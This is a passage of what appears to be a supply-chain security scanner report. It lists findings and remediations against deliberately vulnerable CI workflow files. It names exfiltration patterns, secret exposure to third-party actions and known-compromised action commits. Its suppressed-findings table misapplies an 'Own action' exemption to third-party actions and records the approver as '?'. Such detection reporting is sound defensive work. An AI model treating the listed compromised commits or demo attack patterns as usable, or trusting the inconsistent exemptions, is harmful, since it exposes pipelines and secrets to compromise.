| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/33-ml-model-risks.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/36-additional-malicious-packages.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/05-cache-poisoning.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/21-ai-credential-exposure.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/29-dependency-confusion.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/03-secret-exposure.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/15-behavioral-obfuscation.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/13-binary-dropper.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/16-gitlab-ci.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. Note: this is a GitLab CI file and `permissions` is a GitHub Actions key, so treat this row as a false positive for this file. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/34-network-egress-anomaly.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/31-circleci-config.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. Note: this is a CircleCI file and `permissions` is a GitHub Actions key, so treat this row as a false positive for this file. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/30-azure-pipelines.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. Note: this is an Azure Pipelines file and `permissions` is a GitHub Actions key, so treat this row as a false positive for this file. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/18-scg-config.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/22-polyfill-cdn-attack.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/12-reusable-workflow-trust.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-022 | Data exfiltration pattern: data downloaded and decoded [network_exfiltration] | vulnerable-workflows/17-egress-exfiltration.yml | Review this command. If legitimate, document why. Otherwise remove immediately. |
| 🔶 MEDIUM | SCA-022 | Data exfiltration pattern: data downloaded and decoded [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Review this command. If legitimate, document why. Otherwise remove immediately. |
| 🔶 MEDIUM | SCA-067 | Artifact upload without provenance attestation in 'deep-analysis' [artifact_integrity] | .github/workflows/showcase-pipeline.yml | Add `actions/attest-build-provenance@v2` after the upload step to generate SLSA provenance for published artifacts. |
| 🔶 MEDIUM | SCA-067 | Artifact upload without provenance attestation in 'paranoid-audit' [artifact_integrity] | .github/workflows/showcase-pipeline.yml | Add `actions/attest-build-provenance@v2` after the upload step to generate SLSA provenance for published artifacts. |
| 🔶 MEDIUM | SCA-068 | Artifact download without integrity verification in 'security-integration' [artifact_integrity] | .github/workflows/showcase-pipeline.yml | Verify downloaded artifact integrity with `sha256sum`, `cosign verify` or `slsa-verifier` before use. |
| 🔶 MEDIUM | SCA-068 | Artifact download without integrity verification in 'report-deployment' [artifact_integrity] | .github/workflows/showcase-pipeline.yml | Verify downloaded artifact integrity with `sha256sum`, `cosign verify` or `slsa-verifier` before use. |
| 🔶 MEDIUM | SCA-068 | Artifact download without integrity verification in 'report-deployment' [artifact_integrity] | .github/workflows/showcase-pipeline.yml | Verify downloaded artifact integrity with `sha256sum`, `cosign verify` or `slsa-verifier` before use. |
| 🔶 MEDIUM | SCA-072 | Build and publish in same job 'build-container' (TOCTOU risk) [artifact_integrity] | vulnerable-workflows/26-container-attacks.yml | Separate build and publish into different jobs. Upload artifacts from the build job, verify checksums, then download in the publish job. |
| 🔶 MEDIUM | SCA-067 | Artifact upload without provenance attestation in 'build' [artifact_integrity] | vulnerable-workflows/11-artifact-poisoning.yml | Add `actions/attest-build-provenance@v2` after the upload step to generate SLSA provenance for published artifacts. |
| 🔶 MEDIUM | SCA-068 | Artifact download without integrity verification in 'deploy' [artifact_integrity] | vulnerable-workflows/11-artifact-poisoning.yml | Verify downloaded artifact integrity with `sha256sum`, `cosign verify` or `slsa-verifier` before use. |
| 🔶 MEDIUM | SCA-067 | Artifact upload without provenance attestation in 'build-and-publish' [artifact_integrity] | vulnerable-workflows/28-artifact-attacks.yml | Add `actions/attest-build-provenance@v2` after the upload step to generate SLSA provenance for published artifacts. |
| 🔶 MEDIUM | SCA-071 | Artifact overwrite enabled in 'build-and-publish' [artifact_integrity] | vulnerable-workflows/28-artifact-attacks.yml | Avoid `overwrite: true`. Use unique artifact names per run. Verify artifact checksums after download. |
| 🔶 MEDIUM | SCA-072 | Build and publish in same job 'build-and-publish' (TOCTOU risk) [artifact_integrity] | vulnerable-workflows/28-artifact-attacks.yml | Separate build and publish into different jobs. Upload artifacts from the build job, verify checksums, then download in the publish job. |
| 🔶 MEDIUM | SCA-078 | Docker image pushed without signing [container_security] | vulnerable-workflows/26-container-attacks.yml | Sign images after push with cosign: `cosign sign --key <key> <image>@<digest>`. |
| 🔶 MEDIUM | SCA-BHV-OBF | Data decoding / deobfuscation utility [behavioral_analysis] | .github/workflows/showcase-pipeline.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| 🔶 MEDIUM | SCA-BHV-ART | Appending/writing to build output directory [behavioral_analysis] | .github/workflows/showcase-pipeline.yml | Verify build artifact integrity with checksums. Separate build and publish steps into different jobs. Use SLSA provenance attestations for all published artifacts. |
| 🔶 MEDIUM | SCA-BHV-CRED | Secrets passed to third-party action: `peaceiris/actions-gh-pages@4f9cc6602d3f66b9c108549d475ec49e8ef4d45e` [behavioral_analysis] | .github/workflows/showcase-pipeline.yml | Audit the third-party action's source code at the pinned commit (the ref is already a full SHA). Minimise secrets passed to third-party actions. |
| 🔶 MEDIUM | SCA-BHV-OBF | Data decoding / deobfuscation utility [behavioral_analysis] | vulnerable-workflows/27-oidc-token-abuse.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| 🔶 MEDIUM | SCA-BHV-OBF | Data decoding / deobfuscation utility [behavioral_analysis] | vulnerable-workflows/27-oidc-token-abuse.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| 🔶 MEDIUM | SCA-BHV-OBF | Data decoding / deobfuscation utility [behavioral_analysis] | vulnerable-workflows/27-oidc-token-abuse.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| 🔶 MEDIUM | SCA-BHV-TRUST | Self-hosted runner usage [behavioral_analysis] | vulnerable-workflows/23-self-hosted-runner.yml | Use ephemeral (GitHub-hosted) runners where possible. If self-hosted runners are required, run them in ephemeral mode, rebuild after every job, and never let them execute untrusted workloads such as fork pull requests. |
| 🔶 MEDIUM | SCA-BHV-OBF | Data decoding / deobfuscation utility [behavioral_analysis] | vulnerable-workflows/01-compromised-action.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| 🔶 MEDIUM | SCA-BHV-OBF | Data decoding / deobfuscation utility [behavioral_analysis] | vulnerable-workflows/18-scg-config.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| 🔶 MEDIUM | SCA-BHV-OBF | Data decoding / deobfuscation utility [behavioral_analysis] | vulnerable-workflows/02-pwn-request.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| 🔶 MEDIUM | SCA-BHV-OBF | Data decoding / deobfuscation utility [behavioral_analysis] | vulnerable-workflows/02-pwn-request.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| ๐ถ MEDIUM | SCA-BHV-OBF |
Data decoding / deobfuscation utility
behavioral_analysis |
scripts/generate-site.py | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| Severity | Rule ID | Finding | Location | Remediation |
|---|---|---|---|---|
| ℹ️ LOW | SCA-PROV-SLSA | Package published without attestation<br>provenance_verification | vulnerable-workflows/36-additional-malicious-packages.yml | Add SLSA provenance generation. For npm, use --provenance flag. For PyPI, use Trusted Publishing. Consider actions/attest-build-provenance. |
| ℹ️ LOW | SCA-PROV-SLSA | Package published without attestation<br>provenance_verification | vulnerable-workflows/28-artifact-attacks.yml | Add SLSA provenance generation. For npm, use --provenance flag. For PyPI, use Trusted Publishing. Consider actions/attest-build-provenance. |
| ℹ️ LOW | SCA-083 | Dockerfile runs as root (no USER instruction)<br>container_security | vulnerable-workflows/26-Dockerfile | Add a USER instruction to run as a non-root user: USER 1001:1001 |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'aws-metadata-access'<br>behavioral_analysis | vulnerable-workflows/20-cloud-metadata-imds.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | Error suppression<br>behavioral_analysis | vulnerable-workflows/14-runtime-cryptominer.yml | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| ℹ️ LOW | SCA-BHV-FLOW | Error suppression<br>behavioral_analysis | vulnerable-workflows/14-runtime-cryptominer.yml | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| ℹ️ LOW | SCA-BHV-FLOW | Error suppression<br>behavioral_analysis | vulnerable-workflows/14-runtime-cryptominer.yml | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'test'<br>behavioral_analysis | vulnerable-workflows/14-runtime-cryptominer.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'deploy'<br>behavioral_analysis | vulnerable-workflows/10-oidc-abuse.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build-container'<br>behavioral_analysis | vulnerable-workflows/26-container-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build'<br>behavioral_analysis | vulnerable-workflows/17-egress-exfiltration.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build-checks'<br>behavioral_analysis | vulnerable-workflows/37-build-system-compromise.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'test'<br>behavioral_analysis | vulnerable-workflows/04-network-exfiltration.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'release'<br>behavioral_analysis | vulnerable-workflows/35-dispatch-codeowners.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'post-ci-deploy'<br>behavioral_analysis | vulnerable-workflows/35-dispatch-codeowners.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build'<br>behavioral_analysis | vulnerable-workflows/09-container-escape.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'load-models'<br>behavioral_analysis | vulnerable-workflows/33-ml-model-risks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build'<br>behavioral_analysis | vulnerable-workflows/36-additional-malicious-packages.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | Error suppression<br>behavioral_analysis | vulnerable-workflows/19-teampcp-indicators.yml | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| ℹ️ LOW | SCA-BHV-FLOW | Error suppression<br>behavioral_analysis | vulnerable-workflows/19-teampcp-indicators.yml | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'compromised-trivy-scan'<br>behavioral_analysis | vulnerable-workflows/19-teampcp-indicators.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'imposter-commit-check'<br>behavioral_analysis | vulnerable-workflows/19-teampcp-indicators.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'deploy-staging'<br>behavioral_analysis | vulnerable-workflows/25-reusable-workflow-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'security-scan'<br>behavioral_analysis | vulnerable-workflows/25-reusable-workflow-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build-and-publish'<br>behavioral_analysis | vulnerable-workflows/25-reusable-workflow-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'process-input'<br>behavioral_analysis | vulnerable-workflows/25-reusable-workflow-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'elevated-workflow'<br>behavioral_analysis | vulnerable-workflows/25-reusable-workflow-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build'<br>behavioral_analysis | vulnerable-workflows/05-cache-poisoning.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'deploy-preview'<br>behavioral_analysis | vulnerable-workflows/27-oidc-token-abuse.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build-on-self-hosted'<br>behavioral_analysis | vulnerable-workflows/23-self-hosted-runner.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'test-on-self-hosted'<br>behavioral_analysis | vulnerable-workflows/23-self-hosted-runner.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'train-model'<br>behavioral_analysis | vulnerable-workflows/21-ai-credential-exposure.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'install-deps'<br>behavioral_analysis | vulnerable-workflows/29-dependency-confusion.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build'<br>behavioral_analysis | vulnerable-workflows/11-artifact-poisoning.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'deploy'<br>behavioral_analysis | vulnerable-workflows/11-artifact-poisoning.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'deploy'<br>behavioral_analysis | vulnerable-workflows/03-secret-exposure.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'test'<br>behavioral_analysis | vulnerable-workflows/15-behavioral-obfuscation.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'setup'<br>behavioral_analysis | vulnerable-workflows/13-binary-dropper.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'process-issue'<br>behavioral_analysis | vulnerable-workflows/24-output-injection.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build-and-publish'<br>behavioral_analysis | vulnerable-workflows/28-artifact-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'deploy-from-artifact'<br>behavioral_analysis | vulnerable-workflows/28-artifact-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build'<br>behavioral_analysis | vulnerable-workflows/01-compromised-action.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'run-tests'<br>behavioral_analysis | vulnerable-workflows/34-network-egress-anomaly.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build'<br>behavioral_analysis | vulnerable-workflows/31-circleci-config.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'deploy'<br>behavioral_analysis | vulnerable-workflows/31-circleci-config.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'auto-review'<br>behavioral_analysis | vulnerable-workflows/02-pwn-request.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'build-frontend'<br>behavioral_analysis | vulnerable-workflows/22-polyfill-cdn-attack.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'security-scan'<br>behavioral_analysis | vulnerable-workflows/12-reusable-workflow-trust.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'deploy'<br>behavioral_analysis | vulnerable-workflows/12-reusable-workflow-trust.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'lint'<br>behavioral_analysis | vulnerable-workflows/06-permission-escalation.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'test'<br>behavioral_analysis | vulnerable-workflows/06-permission-escalation.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | No timeout-minutes on job 'deploy'<br>behavioral_analysis | vulnerable-workflows/06-permission-escalation.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| ℹ️ LOW | SCA-BHV-FLOW | Error suppression<br>behavioral_analysis | integrations/local-cli-scan.sh | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| ℹ️ LOW | SCA-BHV-FLOW | Error suppression<br>behavioral_analysis | integrations/local-cli-scan.sh | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| ℹ️ LOW | SCA-BHV-FLOW | Error suppression<br>behavioral_analysis | integrations/local-cli-scan.sh | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| ℹ️ LOW | SCA-105 | [JENKINS] Agent: any (runs on any available node)<br>cross_platform_ci | integrations/Jenkinsfile | Review and remediate this jenkins configuration issue. |
| ℹ️ LOW | SCA-105 | [JENKINS] Checkout SCM without options<br>cross_platform_ci | integrations/Jenkinsfile | Review and remediate this jenkins configuration issue. |
| ℹ️ LOW | SCA-105 | [JENKINS] Agent: any (runs on any available node)<br>cross_platform_ci | vulnerable-workflows/16-Jenkinsfile | Review and remediate this jenkins configuration issue. |
| Severity | Rule ID | Finding | Location | Remediation |
|---|---|---|---|---|
| 🔬 INFO | SCA-COMP-HIST | Action with compromise history: aquasecurity/trivy-action@f77738448eec70113cf711656914b61905b3bd47<br>compromised_actions | vulnerable-workflows/19-teampcp-indicators.yml | Verify the pinned SHA corresponds to a known-good release. Consider alternative actions. |
| 🔬 INFO | SCA-COMP-HIST | Action with compromise history: aquasecurity/setup-trivy@8afa9b9f9183b4e00c46e2b82d34047e3c177bd0<br>compromised_actions | vulnerable-workflows/19-teampcp-indicators.yml | Verify the pinned SHA corresponds to a known-good release. Consider alternative actions. |
| 🔬 INFO | SCA-COMP-HIST | Action with compromise history: tj-actions/changed-files@ae82ed004850e9bfa8b2089b109a1e27e0eee893<br>compromised_actions | vulnerable-workflows/01-compromised-action.yml | Verify the pinned SHA corresponds to a known-good release. Consider alternative actions. |
These findings were suppressed by .scg-config.yml or inline # scg-ignore comments. They are preserved here for the compliance audit trail.
| Severity | Rule ID | Finding | Location | Exemption Reason |
|---|---|---|---|---|
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: anshumaan-10/supply-chain-guardian@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | .github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: anshumaan-10/supply-chain-guardian@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | .github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: anshumaan-10/supply-chain-guardian@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | .github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: anshumaan-10/supply-chain-guardian@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | .github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: anshumaan-10/supply-chain-guardian@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | .github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: anshumaan-10/supply-chain-guardian@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | .github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/20-cloud-metadata-imds.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/14-runtime-cryptominer.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/10-oidc-abuse.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: aws-actions/configure-aws-credentials@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/10-oidc-abuse.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/26-container-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/17-egress-exfiltration.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/37-build-system-compromise.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/04-network-exfiltration.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/35-dispatch-codeowners.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/35-dispatch-codeowners.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/09-container-escape.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/33-ml-model-risks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/36-additional-malicious-packages.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/19-teampcp-indicators.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
